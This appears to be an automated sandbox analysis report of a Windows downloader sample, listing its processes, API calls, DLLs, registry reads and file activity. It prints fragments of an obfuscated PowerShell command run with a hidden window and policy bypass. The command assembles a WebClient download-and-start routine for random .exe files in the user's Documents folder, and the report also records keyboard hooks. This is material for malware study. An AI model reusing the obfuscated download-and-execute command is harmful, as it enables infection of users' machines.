$fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='';$uy='soqckm
Process Created
Process Name Module
cmd.exe /c "pôwêrs^hel^l^.e^xê^ -no^l -no^ni^nt^ -wîndo^ws^ 1 -nopro^file^ -exêcû b^ypa^s^s

$fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-
ob';$nim='e(''';$mo='';$uy='2yv4ez
cmd.exe /c "pôwêrs^hel^l^.e^xê^ -no^l -no^ni^nt^ -wîndo^ws^ 1 -nopro^file^ -exêcû b^ypa^s^s

$fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-
ob';$nim='e(''';$mo='';$uy='soqckm
{0E5AAE11-
A475-4C5B-
AB00-
C66DE400274E}
{1F486A52-
3CB1-48FD-
8F50-
B8DC300D9F9D}
{88D969EC-
8B8B-4C3D-
859E-
AF6CD158BE0F}
{C1EE01F2-
B3B6-4A6A-
9DDD-
E988C088EC82}
{DFFACDC5-
679F-4156-8947-
C5C76BC0B67F}
{FA445657-9379-
11D6-B41A-
00065B83EE53}
Thread Created
2fa7368f
65001f64
Other
Changed the protection attribute of process address: 0x2faf30dc, new attribute: Execute_Read
Changed the protection attribute of process address: 0x2faf30dc, new attribute: Execute_ReadWrite
Deactivated the activation context corresponding to the specified cookie
Initialized COM library for the current thread and set it in the concurrency mode
Install a new hook procedure (type: WH_KEYBOARD)
Install a new hook procedure (type: WH_MSGFILTER)
Obtained the contents of the specified variable from the environment block of the calling process
Obtained the identifier of the thread or process that created the specified window
Retrieved information on a specific string in the current activation context
Network Operations: 1
Socket Activities
Retrieved the name of the network resource associated with a local device
Other Operations: 6
Others
Initialized a critical section object and set the spin count for the critical section
Obtained the current system date and time in in Coordinated Universal Time (UTC) format
Obtained the system metric or system configuration setting
Recorded system information
Retrieved information about a locale specified by a identifier
Retrieved the current local date and time

cmd.exe
File Operations: 20
Files Read
C:\Users\Administrator\Documents
Other
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\powERShell.exe.*
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\powERShell.exe
Searched a directory for the name: C:\Users
Searched a directory for the name: C:\Users\Administrator
Searched a directory for the name: C:\Users\Administrator\Documents
Searched a directory for the name: C:\Users\Administrator\Documents\powERShell.exe.*
Searched a directory for the name: C:\Users\Administrator\Documents\powERShell.exe
Searched a directory for the name: C:\Windows\System32\Wbem\powERShell.exe.*
Searched a directory for the name: C:\Windows\System32\Wbem\powERShell.exe
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\powERShell.exe
Searched a directory for the name: C:\Windows\powERShell.exe.*
Searched a directory for the name: C:\Windows\powERShell.exe
Searched a directory for the name: C:\Windows\system32\powERShell.exe.*
Searched a directory for the name: C:\Windows\system32\powERShell.exe
Registry Opened
HKCU\Software\Microsoft\Command Processor
HKCU\Software\Policies\Microsoft\Windows\System
HKLM\Software\Microsoft\Command Processor
Registry Read
HKCU\Software\Microsoft\Command Processor AutoRun
HKCU\Software\Microsoft\Command Processor CompletionChar
HKCU\Software\Microsoft\Command Processor DefaultColor
HKCU\Software\Microsoft\Command Processor DelayedExpansion
HKCU\Software\Microsoft\Command Processor DisableUNCCheck
HKCU\Software\Microsoft\Command Processor EnableExtensions
HKCU\Software\Microsoft\Command Processor PathCompletionChar
HKLM\Software\Microsoft\Command Processor AutoRun
HKLM\Software\Microsoft\Command Processor CompletionChar
HKLM\Software\Microsoft\Command Processor DefaultColor
HKLM\Software\Microsoft\Command Processor DelayedExpansion
HKLM\Software\Microsoft\Command Processor DisableUNCCheck
HKLM\Software\Microsoft\Command Processor EnableExtensions
HKLM\Software\Microsoft\Command Processor PathCompletionChar
Process Created
Process Name Module
powershell.exe -nol -nonint -windows 1 -noprofile -execu bypass

$fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject
c:\windows\system32\windowspowershell\v1.0\powershell.exe ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-
ob';$nim='e(''';$mo='';$uy='2yv4ezjzrwg';$ji='.ex';$pol='em.ne';$oe=
powershell.exe -nol -nonint -windows 1 -noprofile -execu bypass

$fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject
';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-
ob';$nim='e(''';$mo='';$uy='soqckmm9cu';$ji='.ex';$pol='em.ne';$oe='
Process killed
Ended itself and all of its threads
Other
Enabled an application to supersede the top-level exception handler
Set a waiting mode until a specified object is in the signaled state or the time-out interval elapses
Other Operations: 1
Others
Retrieved information about a locale specified by a identifier
powershell.exe
Run-Time Dlls: 45
advapi32.dll
api-ms-win-appmodel-runtime-l1-1-0.dll
secur32.dll
system.data.dll
system.transactions.dll
iphlpapi.dll
ntdll.dll
psapi.dll
rasapi32.dll
shell32.dll
winhttp.dll
ws2_32.dll
microsoft.powershell.commands.utility.ni.dll
microsoft.powershell.commands.diagnostics.ni.dll
microsoft.powershell.security.ni.dll
microsoft.powershell.commands.management.ni.dll
microsoft.powershell.consolehost.ni.dll
microsoft.wsman.management.ni.dll
mscorlib.ni.dll
system.configuration.install.ni.dll
system.configuration.ni.dll
system.core.ni.dll
system.data.ni.dll
system.directoryservices.ni.dll
system.management.automation.ni.dll
system.management.ni.dll
system.transactions.ni.dll
system.xml.ni.dll
system.ni.dll
culture.dll
diasymreader.dll
mscorrc.dll
mscorjit.dll
mscorwks.dll
ole32.dll
oleaut32.dll
gdi32.dll
kernel32.dll
mscoree.dll
netutils.dll
ntdll
shfolder.dll
shlwapi.dll
user32.dll
version.dll
File Operations: 428
Files Created
File Name Access Mode File Attributes
C:\Users\Administrator\Documents\2YV4eZJZRWG.exe Write 100000
C:\Users\Administrator\Documents\SOQCkMM9Cu.exe Write 100000
Files Opened
Access
File Name File Attributes
Mode
C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch Read Normal
C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config Read Normal
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config Read 100000
C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch Read Normal
C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config Read Normal
C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config Read Normal
C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch Read Normal
C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config Read Normal
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll 20000 10000000
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml Read 8100000
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml Read 8100000
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml Read 8100000
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml Read 8100000
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml Read 8100000
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml Read 8100000
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml Read 8100000
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml Read 8100000
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml Read 8100000
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml Read 8100000
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config Read Normal
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml Read 8100000
C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll Read Normal
C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll Read 8000000

C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll Read Normal
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Read Normal
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Read Normal
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll Read Normal
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll Read Normal
C:\Windows\assembly\NativeImages_v2.0.50727_32\index127.dat Read Normal
C:\Windows\assembly\pubpol17.dat Read Normal
C:\Windows\system32\l_intl.nls Read Normal
Read
CONOUT$ & Normal
Write
Files Deleted
C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1160.4030250
C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2308.4030015
C:\Users\Administrator\Documents\2YV4eZJZRWG.exe
C:\Users\Administrator\Documents\SOQCkMM9Cu.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch.1160.4030250
C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch.2308.4030015
C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch.1160.4030250
C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch.2308.4030015
Files Read
2YV4eZJZRWG.exe
C:\.
C:\
C:\ProgramData\Oracle\Java\javapath
C:\Users
C:\Users\.
C:\Users\Administrator
C:\Users\Administrator\.
C:\Users\Administrator\Documents
C:\Users\Administrator\Documents\.
C:\Windows
C:\Windows\Microsoft.NET\Framework\
C:\Windows\Microsoft.NET\Framework\v2.0.50727
C:\Windows\Microsoft.NET\Framework\v2.0.50727\
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\SysWOW64\WindowsPowerShell\v1.0
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.config
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml
C:\Windows\System32\Wbem
C:\Windows\System32\WindowsPowerShell\v1.0\
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll
C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll
C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll
C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll
C:\Windows\system32
SOQCkMM9Cu.exe
Memory Mapped Files
Opened a named file-mapping object
Other
Obtained a bitmask representing the currently available disk drives
Obtained information about the file system and volume associated with the root directory
Obtained path of the folder from its CLSID
Obtained the path of the Windows system directory
Retrieved the path of the Windows directory
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.BAT
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.CMD
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.COM
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.EXE
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.JS
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.JSE
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.MSC
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.VBE
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.VBS
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.WSF
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.WSH
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.ps1
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.psd1
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe.psm1
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\2YV4eZJZRWG.exe
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.BAT

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.CMD
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.COM
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.EXE
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.JS
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.JSE
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.MSC
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.VBE
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.VBS
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.WSF
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.WSH
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.ps1
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.psd1
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe.psm1
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\SOQCkMM9Cu.exe
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.BAT
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.CMD
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.COM
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.EXE
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.JS
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.JSE
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.MSC
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.VBE
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.VBS
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.WSF
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.WSH
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.ps1
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.psd1
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe.psm1
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-2YV4eZJZRWG.exe
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.BAT
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.CMD
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.COM
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.EXE
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.JS
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.JSE
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.MSC
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.VBE
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.VBS
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.WSF
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.WSH
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.ps1
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.psd1
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe.psm1
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\get-SOQCkMM9Cu.exe
Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.BAT
Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.CMD
Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.COM
Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.EXE
Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.JS

Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.JSE
Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.MSC
Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.VBE
Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.VBS
Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.WSF
Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.WSH
Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.ps1
Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.psd1
Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe.psm1
Searched a directory for the name: C:\Windows\2YV4eZJZRWG.exe
Searched a directory for the name: C:\Windows\Microsoft.NET\Framework\\*
Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.BAT
Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.CMD
Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.COM
Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.EXE
Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.JS
Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.JSE
Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.MSC
Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.VBE
Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.VBS
Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.WSF
Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.WSH
Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.ps1
Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.psd1
Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe.psm1
Searched a directory for the name: C:\Windows\SOQCkMM9Cu.exe
Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.BAT
Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.CMD
Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.COM
Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.EXE
Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.JS
Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.JSE
Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.MSC
Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.VBE
Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.VBS
Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.WSF
Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.WSH
Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.ps1
Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.psd1
Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe.psm1
Searched a directory for the name: C:\Windows\System32\Wbem\2YV4eZJZRWG.exe
Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.BAT
Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.CMD
Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.COM
Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.EXE
Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.JS
Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.JSE
Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.MSC
Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.VBE
Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.VBS

Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.WSF
Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.WSH
Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.ps1
Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.psd1
Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe.psm1
Searched a directory for the name: C:\Windows\System32\Wbem\SOQCkMM9Cu.exe
Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.BAT
Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.CMD
Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.COM
Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.EXE
Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.JS
Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.JSE
Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.MSC
Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.VBE
Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.VBS
Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.WSF
Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.WSH
Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.ps1
Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.psd1
Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe.psm1
Searched a directory for the name: C:\Windows\System32\Wbem\get-2YV4eZJZRWG.exe
Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.BAT
Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.CMD
Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.COM
Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.EXE
Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.JS
Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.JSE
Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.MSC
Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.VBE
Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.VBS
Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.WSF
Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.WSH
Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.ps1
Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.psd1
Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe.psm1
Searched a directory for the name: C:\Windows\System32\Wbem\get-SOQCkMM9Cu.exe
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.BAT
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.CMD
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.COM
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.EXE
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.JS
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.JSE
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.MSC
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.VBE
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.VBS
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.WSF
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.WSH
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.ps1
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.psd1

Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe.psm1
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\2YV4eZJZRWG.exe
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.BAT
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.CMD
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.COM
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.EXE
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.JS
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.JSE
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.MSC
Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\SOQCkMM9Cu.exe.VBE
